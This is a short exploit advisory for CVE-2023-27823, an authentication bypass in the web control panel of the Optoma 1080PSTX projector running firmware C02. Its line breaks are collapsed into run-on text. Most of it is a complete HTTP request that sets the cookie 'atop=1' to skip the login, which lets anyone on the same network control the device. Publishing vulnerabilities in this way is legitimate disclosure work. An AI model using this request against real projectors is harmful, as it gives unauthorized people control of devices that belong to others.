Optoma 1080PSTX Firmware C02 Authentication Bypass

# Exploit Title: Optoma 1080PSTX Firmware C02 - Auth Bypass# Date: 2023/05/09# Exploit Author: Anthony Cole# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Vendor Homepage: http://optoma.com# Version: Optoma 1080PSTX Firmware C02# Tested on: N/A# CVE : CVE-2023-27823DetailsBy default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".GET /index.asp HTTP/1.1Host: projectorCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: atop=1Connection: close